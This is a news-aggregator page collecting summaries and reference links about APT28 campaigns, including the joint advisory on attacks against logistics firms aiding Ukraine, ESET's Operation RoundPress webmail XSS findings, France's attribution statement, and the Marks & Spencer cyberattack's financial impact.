@industrialcyber.co
//
A Russian state-sponsored cyber espionage campaign, attributed to the GRU's APT28 (also known as Fancy Bear or Forest Blizzard), has been actively targeting Western logistics entities and technology companies since 2022. This campaign focuses on organizations involved in the coordination, transport, and delivery of foreign assistance to Ukraine. The goal is to gain access to sensitive information and disrupt operations, presenting a serious risk to these targeted organizations and sectors across more than a dozen countries.
These Russian cyber actors have been using a mix of previously disclosed tactics, techniques, and procedures (TTPs), including credential brute force attacks, spear-phishing using multilingual lures, and malware delivery via malicious archives exploiting vulnerabilities. They've also been observed hacking into IP cameras at Ukrainian border crossings to monitor and track aid shipments. The GRU unit, known as military unit 26165, has been linked to compromising a wide array of entities, spanning air, sea, and rail transportation modes.
To defend against these threats, organizations are urged to familiarize themselves with the identified TTPs and indicators of compromise (IOCs), increase monitoring and threat hunting, and strengthen their network defenses. The attacks have targeted companies and government organizations in numerous countries, including Bulgaria, the Czech Republic, France, Germany, Greece, Italy, Moldova, the Netherlands, Poland, Romania, Slovakia, Ukraine, and the United States. The advisory is co-signed by over 20 agencies from multiple countries, underscoring the global nature of this threat.
Recommended read:
References :
- Metacurity: This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies.
- NCSC News Feed: UK and allies expose Russian intelligence campaign targeting western logistics and technology organisations
- CyberInsider: Russian GRU Cyber Campaign Targets Western Logistics and Tech Firms
- securityonline.info: Russian GRU’s APT28 Targets Global Logistics Supporting Ukraine Defense
- securityonline.info: Russian GRU Targets Global Logistics Supporting Ukraine Defense
- www.cybersecuritydive.com: Russian stepping up attacks on firms aiding Ukraine, Western nations warn
- cyberinsider.com: Russian GRU Cyber Campaign Targets Western Logistics and Tech Firms
- BleepingComputer: A Russian state-sponsored cyberespionage campaign attributed to APT28 (Fancy Bear/Forest Blizzard) hackers has been targeting and compromising international organizations since 2022 to disrupt aid efforts to Ukraine.
- BleepingComputer: A Russian state-sponsored cyberespionage campaign attributed to APT28 (Fancy Bear/Forest Blizzard) hackers has been targeting and compromising international organizations since 2022 to disrupt aid efforts to Ukraine.
- securityaffairs.com: Russia-linked APT28 targets western logistics entities and technology firms
- Threats | CyberScoop: Multi-national warning issued over Russia’s targeting of logistics, tech firms
- socprime.com: russian GRU Unit 26156 Targets Western Logistics and Technology Companies Coordinating Aid to Ukraine in a Two-Year Hacking Campaign
- Blog: Russian APT28 targets Western firms supporting Ukraine
- SOC Prime Blog: Detect APT28 Attacks: russian GRU Unit 26156 Targets Western Logistics and Technology Companies Coordinating Aid to Ukraine in a Two-Year Hacking Campaign
- Metacurity: Russia's APT28 accused of infiltrating Western logistics, technology firms
- Resources-2: Russian APT28 (aka Fancy Bear/Unit 26165) targets Western logistics and tech firms in Ukraine aid tracking operation
- Virus Bulletin: Details a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies involved in the coordination, transport and delivery of foreign assistance to Ukraine.
- DataBreaches.Net: Western intelligence agencies unite to expose Russian hacking campaign against logistics and tech firms
- www.scworld.com: CISA warns Russia-linked group APT28 is targeting Western logistics and tech firms aiding Ukraine, posing an elevated threat to supply chains
- eSecurity Planet: Russian Hackers Target Western Firms Aiding Ukraine, Spy on Shipments
- www.esecurityplanet.com: Russian military hackers are targeting Western firms aiding Ukraine, using cyberespionage to infiltrate logistics networks and spy on arms shipments.
- cyberscoop.com: Multi-national warning issued over Russia’s targeting of logistics, tech firms
- industrialcyber.co: Russian GRU’s Unit 26165 conducts two-year cyber espionage on logistics, tech firms using IP cameras, supply chains
- www.csoonline.com: Russian APT28 compromised Western logistics and IT firms to track aid to Ukraine
- Industrial Cyber: Russian GRU’s Unit 26165 conducts two-year cyber espionage on logistics, tech firms using IP cameras, supply chains
Dhara Shrivastava@cysecurity.news
//
British retailer giant Marks & Spencer (M&S) is facing a major financial impact following a recent cyberattack, with potential profit losses estimated at £300 million, equivalent to $402 million. The attack has caused widespread operational and sales disruptions, particularly affecting the company's online retail systems. According to a recent filing with the London Stock Exchange, M&S anticipates these disruptions to continue until at least July, impacting its fiscal year 2025/26 profits.
The cyberattack has significantly impacted M&S’s online sales channels, forcing the company to temporarily halt online shopping in its Fashion, Home & Beauty divisions. This downtime has led to substantial revenue loss, despite the resilience of its physical stores. The company has also faced increased logistics and waste management costs as it reverted to manual processes. CEO Stuart Machin acknowledged the challenging situation but expressed confidence in the company's recovery, emphasizing a focus on restoring systems and accelerating technical transformation.
M&S is actively implementing strategies to mitigate the financial repercussions, including cost management, insurance claims, and strategic trading actions. The retailer is reportedly preparing to claim up to £100 million from its cyber insurance policy to offset some of the losses. The company views this crisis as an opportunity to expedite its technical transformation, although specific details of this transformation have not yet been disclosed. The costs related to the attack itself and technical recovery are expected to be communicated at a later date as an adjustment item.
Recommended read:
References :
- The Register - Security: Marks & Spencer warns of a £300M dent in profits from cyberattack
- The DefendOps Diaries: Marks & Spencer Faces Major Financial Impact from Cyberattack
- BleepingComputer: Marks & Spencer faces $402 million profit hit after cyberattack
- ComputerWeekly.com: M&S cyber attack disruption likely to last until July
- BleepingComputer: British retailer giant Marks & Spencer (M&S) is bracing for a potential profit hit of up to £300 million £300 million ($402 million) following a recent cyberattack that led to widespread operational and sales disruptions.
- techxplore.com: Marks & Spencer cyberattack: How can retailers regain customers' trust after a hack?
- www.cybersecuritydive.com: M&S warns April cyberattack will cut $400 million from profits
- The Hacker News: Russian cyber threat actors have been attributed to a state-sponsored campaign targeting Western logistics entities and technology companies since 2022.
- DataBreaches.Net: Western intelligence agencies unite to expose Russian hacking campaign against logistics and tech firms
- techxplore.com: Cyberattack costs UK retailer Marks & Spencer £300 mn
- www.cysecurity.news: Scattered Spider Cyberattack Cripples M&S, Co-op: DragonForce Ransomware Causes Weeks-Long Disruption
- Tech Monitor: Marks & Spencer faces £300m impact on profit from cyberattack
- www.bleepingcomputer.com: Marks & Spencer faces $402 million profit hit after cyberattack
- socprime.com: A joint advisory from cybersecurity and intelligence agencies across North America, Europe, and Australia confirms a two-year-long cyberespionage campaign by russian GRU Unit 26165 (APT28, Forest Blizzard, Fancy Bear).
- www.esecurityplanet.com: Russian military hackers are targeting Western firms aiding Ukraine, using cyberespionage to infiltrate logistics networks and spy on arms shipments.
Field Effect@Blog
//
A cyber espionage campaign dubbed "Operation RoundPress" has been attributed to the Russian state-sponsored hacking group APT28, also known as Fancy Bear, among other aliases. Security researchers at ESET have uncovered that this operation, active since 2023, targets high-value webmail servers by exploiting cross-site scripting (XSS) vulnerabilities. The primary objective is to steal confidential data from specific email accounts. The attackers have been observed targeting several webmail platforms.
In 2024, the scope of Operation RoundPress expanded beyond Roundcube, including webmail software such as Horde, MDaemon, and Zimbra. Specifically, the group exploited a zero-day XSS vulnerability, CVE-2024-11182, in MDaemon before a patch was available. The vulnerability was reported to the developers on November 1st, 2024, and subsequently patched in version 24.5.1. The exploitation involves injecting malicious JavaScript code into the victim's webmail page via spearphishing emails.
The victims primarily consist of governmental entities and defense companies in Eastern Europe. However, governments in Africa, Europe, and South America have also been targeted. The injected JavaScript payloads, analyzed by ESET and named SpyPress, are designed to steal webmail credentials and exfiltrate contacts and email messages from the victim’s mailbox. In the case of MDaemon, the attackers were able to set up a bypass for two-factor authentication. ESET has made Indicators of Compromise (IOCs) available on their GitHub repository.
Recommended read:
References :
- Blog: Russian APT28 hackers leverage webmail zero-day
- ESET Research: publishes its investigation of Operation RoundPress, which uses XSS vulnerabilities to target high-value webmail servers. We attribute the operation to Sednit with medium confidence. In 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other webmail software including Horde, MDaemon, and Zimbra.
- www.welivesecurity.com: publishes its investigation of Operation RoundPress, which uses XSS vulnerabilities to target high-value webmail servers. We attribute the operation to Sednit with medium confidence. In 2023, Operation RoundPress only targeted Roundcube, but in 2024 it expanded to other webmail software including Horde, MDaemon, and Zimbra..
- The Hacker News: Russia-Linked APT28 Exploited MDaemon Zero-Day to Hack Government Webmail Servers
- The DefendOps Diaries: Government Webmail Hacked via XSS Bugs in Global Spy Campaign
- securityonline.info: Operation RoundPress: Sednit Weaponizes XSS to Breach Global Webmail Servers
- Virus Bulletin: ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers with spear-phishing emails leveraging an XSS vulnerability. Most of the victims are government entities and defence companies in Eastern Europe.
- WeLiveSecurity: Sednit abuses XSS flaws to hit gov't entities, defense companies
- WeLiveSecurity: ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
- www.scworld.com: Global government webmail servers targeted by Russian cyberespionage operation
- BleepingComputer: Hackers are running a worldwide cyberespionage campaign dubbed 'RoundPress,' leveraging zero-day and n-day flaws in webmail servers to steal email from high-value government organizations.
- securityonline.info: Researchers expose a covert cyberespionage campaign, dubbed Operation RoundPress, believed to be orchestrated by the Russia-aligned Sednit APT group.
- www.techradar.com: Global Russian hacking campaign steals data from government agencies
- www.scworld.com: Sednit group's 'Operation RoundPress' targets webmail servers globally
- hackread.com: ESET reports on RoundPress, a cyber espionage campaign by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations via webmail…
- Thomas Roccia :verified:: ESET researchers uncover a Russia-aligned espionage operation targeting webmail servers via XSS vulnerabilities
- ciso2ciso.com: Russian APT Exploiting Mail Servers Against Government, Defense Organizations – Source: www.securityweek.com
Swagath Bandhakavi@Tech Monitor
//
France has officially accused the APT28 hacking group, linked to Russia's military intelligence service (GRU), of orchestrating a series of cyberattacks against French institutions over the past four years. The French foreign ministry condemned these actions "in the strongest possible terms," highlighting the targeting or breaching of a dozen French entities. The attacks have affected a range of organizations, including public services, private companies, and even a sports organization involved in preparations for the 2024 Olympic Games which was hosted in France.
France views these cyber operations as "unacceptable and unworthy" of a permanent member of the UN Security Council, asserting that Russia has violated international norms of responsible behavior in cyberspace. The ministry emphasized that such destabilizing activities undermine the integrity of international relations and security. This public attribution of the attacks to the GRU signifies a firm stance against Russia's malicious cyber activities and a commitment to defending French interests in the digital realm.
France, alongside its partners, is determined to anticipate, deter, and respond to Russia’s malicious cyber behavior, employing all available means. The French foreign ministry's statement also referenced past incidents, including the 2015 sabotage of TV5Monde and attempts to disrupt the 2017 presidential election, underscoring a pattern of APT28's disruptive activities targeting French interests. The French national agency for information systems security (ANSSI) has released a report on the threat linked to APT28 in order to prevent future attacks.
Recommended read:
References :
- therecord.media: In a rare public attribution, the French foreign ministry said it “condemns in the strongest possible terms†the actions of the GRU-linked threat actor known as APT28 for attacks against local entities.
- BleepingComputer: Today, the French foreign ministry blamed the APT28 hacking group linked to Russia's military intelligence service (GRU) for targeting or breaching a dozen French entities over the last four years.
- www.diplomatie.gouv.fr: Government of attributes a wide range of dating back ten years, targeting the French-hosted 2024 Olympics, prior elections, and against entities like television networks, to Russia's GRU
- The Record: Mastodon post referencing the French foreign ministry statement that it “condemns in the strongest possible terms†the actions of the GRU-linked threat actor known as APT28 for attacks against local entities.
- The DefendOps Diaries: The article is about unmasking APT28: The Sophisticated Threat to French Cybersecurity
- bsky.app: Russian military intelligence cyber operations targeting French entities
- www.techradar.com: France accuses Russian GRU hackers of targeting French organizations
- securityaffairs.com: France links Russian APT28 to attacks on dozen French entities
- Metacurity: France accuses Russia's APT28 of a string of serious cyberattacks going back to 2021
- Risky.Biz: Risky Bulletin: French government grows a spine and calls out Russia's hacks
- www.metacurity.com: France accuses Russia's APT28 of a string of serious cyberattacks going back to 2021
- Tech Monitor: France links Russian military-backed hackers APT28 to multiple cyber intrusions
- hackread.com: France accuses Russia’s APT28 hacking group (Fancy Bear) of targeting French government entities in a cyber espionage campaign.
- Risky Business Media: Risky Bulletin: French government grows spine, calls out Russian hacks
- bsky.app: Russian military intelligence cyber operations targeting French entities. Primarily includes governmental, diplomatic, and research entities, as well as think-tanks.
- www.scworld.com: French authorities have condemned a long-term cyber-espionage campaign by a Russian military intelligence group, APT28, targeting various French institutions.
- Andrew ? Brandt ?: The government of attributes a wide range of dating back ten years, targeting the French-hosted 2024 Olympics, prior elections, and against entities like television networks, to Russia's GRU ( ), and condemns them, officially, in a statement posted to their website.
- www.csoonline.com: France has publicly accused Russias GRU military intelligence agency, specifically its APT28 unit, of orchestrating a sustained cyber campaign targeting French institutions to undermine national stability, Reuters reports.
- Industrial Cyber: The French foreign ministry has attributed a series of cyberattacks on national interests to APT28, a group linked...
- industrialcyber.co: The French foreign ministry has attributed a series of cyberattacks on national interests to APT28, a group linked... The post appeared first on .
- hackread.com: From TV5Monde to Critical Infrastructure: France Blames Russia’s APT28 for Persistent Cyberattacks
- securityonline.info: APT28 Cyber Espionage Campaign Targets French Institutions Since 2021
|
|
FlagThis - #apt28